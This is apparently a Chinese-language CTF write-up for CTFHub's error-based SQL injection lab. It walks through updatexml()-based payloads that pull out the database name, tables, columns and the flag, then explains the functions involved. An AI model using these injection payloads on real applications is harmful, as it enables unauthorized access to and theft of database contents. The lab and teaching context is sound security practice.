CTFHUB-SQL注入-报错注入
本文所使用到的一些函数的使用我去找了一些博主的文章,放在文章末尾了
首先进入环境查询1
回显正常
接着查询1’
页面回显报错,这里就要想着利用数据库的一些机制去进行人为的制造错误,使我们要查询的信息出现在报错信息中
使用updatexml()报错注入来获取信息
输入sql语句
1 union select updatexml(1,concat(0x7e,database(),0x7e),1);
获取到数据库名:sqli
接着查询表
1 union select updatexml(1,concat(0x7e, (select(group_concat(table_name))from information_schema.tables where table_schema="sqli") ,0x7e),1);
得到news和flag两个表名
接着查询flag表中的列
1 union select updatexml(1,concat(0x7e, (select(group_concat(column_name))from information_schema.columns where table_name="flag") ,0x7e),1);
查询结果列名为:flag
查询内容
1 union select updatexml(1,concat(0x7e, (select(group_concat(flag)) from sqli.flag) ,0x7e),1);
然而由于回显长度的限制,没有完全返回所有值,使用right函数让后半部分的内容回显出来
1 union select updatexml(1,concat(0x7e, right((select(group_concat(flag)) from sqli.flag) ,31),0x7e),1);
这里的flag是动态刷新的,所以查询结果不一样,长度也会不一样
一、updatexml函数
UPDATEXML (XML_document, XPath_string, new_value);
第一个参数:XML_document是String格式,为XML文档对象的名称。
第二个参数:XPath_string (Xpath格式的字符串) 。
第三个参数:new_value,String格式,替换查找到的符合条件的数据
作用:改变文档中符合条件的节点的值。
由于updatexml的第二个参数需要Xpath格式的字符串,以~开头的内容不是xml格式的语法,concat()函数为字符串连接函数显然不符合规则,但是会将括号内的执行结果以错误的形式报出,这样就可以实现报错注入了。
同样的,还可以利用floor()、extractvalue()等函数进行报错注入,可见https://www.cnblogs.com/wocalieshenmegui/p/5917967.html。
二、常用函数
right(str, num):字符串从右开始截取num个字符
left(str,num):字符串从左开始截取num个字符
substr(str,N,M): 字符串从第N个字符开始,截取M个字符